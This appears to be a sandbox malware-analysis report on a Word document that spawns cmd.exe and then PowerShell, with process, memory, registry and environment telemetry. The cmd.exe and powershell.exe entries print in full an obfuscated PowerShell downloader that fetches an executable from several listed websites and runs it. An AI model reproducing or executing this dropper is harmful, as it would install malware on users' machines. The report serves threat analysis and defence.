Get Address Unknown module name function = SafeArrayCopyData, address_out = 0x7feff1c60b0 True 1
Fn
Get Address Unknown module name function = SafeArrayAllocDescriptorEx, address_out = 0x7feff1c3e90 True 1
Fn
Get Address Unknown module name function = SafeArrayCreateEx, address_out = 0x7feff219f80 True 1
Fn
Get Address Unknown module name function = VarFormat, address_out = 0x7feff249b20 True 1
Fn
Get Address Unknown module name function = VarFormatDateTime, address_out = 0x7feff249aa0 True 1
Fn
Get Address Unknown module name function = VarFormatNumber, address_out = 0x7feff249990 True 1
Fn
Get Address Unknown module name function = VarFormatPercent, address_out = 0x7feff249890 True 1
Fn
Get Address Unknown module name function = VarFormatCurrency, address_out = 0x7feff249770 True 1
Fn
Get Address Unknown module name function = VarWeekdayName, address_out = 0x7feff22b8d0 True 1
Fn
Get Address Unknown module name function = VarMonthName, address_out = 0x7feff22b800 True 1
Fn
Get Address Unknown module name function = VarAdd, address_out = 0x7feff2448e0 True 1
Fn
Get Address Unknown module name function = VarAnd, address_out = 0x7feff249470 True 1
Fn
Get Address Unknown module name function = VarCat, address_out = 0x7feff2496a0 True 1
Fn
Get Address Unknown module name function = VarDiv, address_out = 0x7feff242fe0 True 1
Fn
Get Address Unknown module name function = VarEqv, address_out = 0x7feff249cf0 True 1
Fn
Get Address Unknown module name function = VarIdiv, address_out = 0x7feff248ff0 True 1
Fn
Get Address Unknown module name function = VarImp, address_out = 0x7feff249c00 True 1
Fn
Get Address Unknown module name function = VarMod, address_out = 0x7feff248e60 True 1
Fn
Get Address Unknown module name function = VarMul, address_out = 0x7feff243690 True 1
Fn
Get Address Unknown module name function = VarOr, address_out = 0x7feff2492d0 True 1
Fn
Get Address Unknown module name function = VarPow, address_out = 0x7feff242e80 True 1
Fn
Get Address Unknown module name function = VarSub, address_out = 0x7feff243f90 True 1
Fn
Get Address Unknown module name function = VarXor, address_out = 0x7feff2491a0 True 1
Fn
Get Address Unknown module name function = VarAbs, address_out = 0x7feff227c30 True 1
Fn
Get Address Unknown module name function = VarFix, address_out = 0x7feff227a60 True 1
Fn
Get Address Unknown module name function = VarInt, address_out = 0x7feff227890 True 1
Fn
Get Address Unknown module name function = VarNeg, address_out = 0x7feff227ea0 True 1
Fn
Get Address Unknown module name function = VarNot, address_out = 0x7feff249600 True 1
Fn
Get Address Unknown module name function = VarRound, address_out = 0x7feff2276a0 True 1
Get Address Unknown module name function = VarCmp, address_out = 0x7feff2483f0 True 1
Get Address Unknown module name function = VarDecAdd, address_out = 0x7feff1f3070 True 1
Get Address Unknown module name function = VarDecCmp, address_out = 0x7feff1fd700 True 1
Get Address Unknown module name function = VarBstrCat, address_out = 0x7feff1fd890 True 1
Get Address Unknown module name function = VarCyMulI4, address_out = 0x7feff1dcaf0 True 1
Get Address Unknown module name function = VarBstrCmp, address_out = 0x7feff1e8a00 True 1
Get Address Unknown module name function = CoCreateInstanceEx, address_out = 0x7fefe81de90 True 1
Get Address Unknown module name function = CLSIDFromProgIDEx, address_out = 0x7fefe82a4c4 True 1
Get Address Unknown module name function = MsoMultiByteToWideChar, address_out = 0x7fee359f200 True 1
Get Address Unknown module name function = 713, address_out = 0x7fef103a1f4 True 1
Get Address Unknown module name function = 601, address_out = 0x7fef103c3e0 True 1
Get Address Unknown module name function = 600, address_out = 0x7fef0dbc6fc True 1
Get Address Unknown module name function = 632, address_out = 0x7fef0dffe60 True 1
Get Address Unknown module name function = 608, address_out = 0x7fef0e0142c True 1
System (30)
Operation Additional Information Success Count Logfile
Get Cursor x_out = 959, y_out = 696 True 3
Get Time type = Local Time, time = 2017-11-28 18:18:02 (Local Time) True 16
Get Time type = Local Time, time = 2017-11-28 18:18:03 (Local Time) True 2
Get Time type = Local Time, time = 2017-11-28 18:19:09 (Local Time) True 6
Get Info type = Operating System False 2
Get Info type = Operating System True 1
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String name = DDRYBUR False 1
Process #2: cmd.exe
(Host: 88, Network: 0)
Information Value
ID #2
File Name c:\windows\system32\cmd.exe
Command Line CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host 
uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) )
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:19, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:02:04
OS Process Information
Information Value
PID 0xad0
Parent PID 0x9d4 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AD4
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True True False
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True True False
private_0x0000000000150000 0x00150000 0x0024ffff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x0036ffff Private Memory Readable, Writable True True False
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory Readable, Writable True True False
private_0x0000000000520000 0x00520000 0x0052ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000530000 0x00530000 0x006b7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000006c0000 0x006c0000 0x00840fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000850000 0x00850000 0x01c4ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001c50000 0x01c50000 0x01f92fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01fa0000 0x0226efff Memory Mapped File Readable False False False
cmd.exe 0x49f60000 0x49fb8fff Memory Mapped File Readable, Writable, Executable True False False
user32.dll 0x76e70000 0x76f69fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f70000 0x7708efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
winbrand.dll 0x7fef5290000 0x7fef5297fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x7fefd320000 0x7fefd38afff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7fefd490000 0x7fefd49dfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7fefd4a0000 0x7fefd568fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefe300000 0x7fefe32dfff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7fefe330000 0x7fefe396fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7fefebf0000 0x7fefecf8fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefef80000 0x7feff01efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feff3b0000 0x7feff3b0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory Readable, Writable True True False
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory Readable, Writable True True False
Host Behavior
File (10)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Open STD_OUTPUT_HANDLE - True 5
Open STD_INPUT_HANDLE - True 3
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xaec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x49f60000 True 1
Get Handle c:\windows\system32\kernel32.dll base_address = 0x76f70000 True 2
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CmD.exe, size = 260 True 1
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x76f86d40 True 1
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x76f823d0 True 1
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x76f78290 True 1
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76f817e0 True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2017-11-28 18:18:04 (UTC) True 1
Get Time type = Ticks, time = 85301 True 1
Environment (50)
Operation Additional Information Success Count Logfile
Get Environment String - True 11
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 2
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT False 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Get Environment String name = binkOHOTJcSMBkQ False 1
Get Environment String name = =EINhmPkdO&&set False 1
Get Environment String name = kiqjRiiiH False 2
Get Environment String name = =owe^r^s&&set False 1
Get Environment String name = zzwpVwCTCRDvTBu False 1
Get Environment String name = =pOwoJiQoW&&set False 1
Get Environment String name = CdjPuLtXi False 2
Get Environment String name = =p&&set False 1
Get Environment String name = GKZajcAqFZkRLZw False 1
Get Environment String name = =NazJjhVlGSrXQvT&&set False 1
Get Environment String name = QiiPPcnDM False 2
Get Environment String name = =^he^l^l&&set False 1
Get Environment String name = jiIZiKXbkZQMpuQ False 1
Get Environment String name = =dipAbiiHEplZSHr&&! False 1
Get Environment String name = !! False 2
Get Environment String name = ! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp False 1
Get Environment String name = %CdjPuLtXi%, result_out = p True 1
Get Environment String name = %kiqjRiiiH%, result_out = owers True 1
Get Environment String name = %QiiPPcnDM%, result_out = hell True 1
Set Environment String name = PROMPT, value = $P$G True 1
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Set Environment String name = %binkOHOTJcSMBkQ%, value = EINhmPkdO True 1
Set Environment String name = %kiqjRiiiH%, value = owers True 1
Set Environment String name = %zzwpVwCTCRDvTBu%, value = pOwoJiQoW True 1
Set Environment String name = %CdjPuLtXi%, value = p True 1
Set Environment String name = COPYCMD True 1
Set Environment String name = =ExitCode, value = 00000000 True 1
Set Environment String name = =ExitCodeAscii True 1
Process #3: powershell.exe
(Host: 694, Network: 17)
Information Value
ID #3
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line powershell ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce 
VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) )
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:19, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:02:04
OS Process Information
Information Value
PID 0xaec
Parent PID 0xad0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AF0
0x AF4
0x B00
0x B04
0x B08
0x B0C
0x B14
0x B18
0x B1C
0x B20
0x B28
0x B3C
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
private_0x0000000000050000 0x00050000 0x000cffff Private Memory Readable, Writable True True False
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False
pagefile_0x0000000000140000 0x00140000 0x00146fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000150000 0x00150000 0x00151fff Pagefile Backed Memory Readable, Writable True False False
powershell.exe.mui 0x00160000 0x00162fff Memory Mapped File Readable, Writable False False False
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True True False
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001b0000 0x001b0000 0x001b1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable True False False
cversions.2.db 0x001e0000 0x001e3fff Memory Mapped File Readable True False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db 0x001f0000 0x00214fff Memory Mapped File Readable True False False
private_0x0000000000220000 0x00220000 0x0031ffff Private Memory Readable, Writable True True False
private_0x0000000000320000 0x00320000 0x0041ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory Readable, Writable True False False
cversions.2.db 0x00430000 0x00433fff Memory Mapped File Readable True False False
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory Readable True False False
private_0x0000000000450000 0x00450000 0x0045ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005f0000 0x005f0000 0x00770fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000780000 0x00780000 0x01b7ffff Pagefile Backed Memory Readable True False False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db 0x01b80000 0x01baffff Memory Mapped File Readable True False False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x01bb0000 0x01c15fff Memory Mapped File Readable True False False
pagefile_0x0000000001c20000 0x01c20000 0x01c22fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001c30000 0x01c30000 0x01c30fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001c40000 0x01c40000 0x01c4ffff Private Memory Readable, Writable True True False
private_0x0000000001c50000 0x01c50000 0x01c5ffff Private Memory Readable, Writable True True False
private_0x0000000001c60000 0x01c60000 0x01d5ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001d60000 0x01d60000 0x01e3efff Pagefile Backed Memory Readable True False False
private_0x0000000001e40000 0x01e40000 0x01ebffff Private Memory Readable, Writable True True False
private_0x0000000001ec0000 0x01ec0000 0x01f3ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000001f40000 0x01f40000 0x01f5ffff Private Memory - True True False
l_intl.nls 0x01f60000 0x01f62fff Memory Mapped File Readable False False False
private_0x0000000001f70000 0x01f70000 0x01f70fff Private Memory Readable, Writable True True False
private_0x0000000001f80000 0x01f80000 0x01f8ffff Private Memory Readable, Writable True True False
sorttbls.nlp 0x01f90000 0x01f94fff Memory Mapped File Readable False False False
microsoft.wsman.runtime.dll 0x01fa0000 0x01fa7fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000001fb0000 0x01fb0000 0x01fb0fff Pagefile Backed Memory Readable True False False
private_0x0000000001fc0000 0x01fc0000 0x0203ffff Private Memory Readable, Writable True True False
pagefile_0x0000000002040000 0x02040000 0x02040fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000002040000 0x02040000 0x02050fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000002070000 0x02070000 0x020effff Private Memory Readable, Writable True True False
sortdefault.nls 0x020f0000 0x023befff Memory Mapped File Readable False False False
private_0x00000000023d0000 0x023d0000 0x0244ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000002450000 0x02450000 0x024cffff Private Memory Readable, Writable True True False
pagefile_0x00000000024d0000 0x024d0000 0x028c2fff Pagefile Backed Memory Readable True False False
private_0x00000000028d0000 0x028d0000 0x029cffff Private Memory Readable, Writable True True False
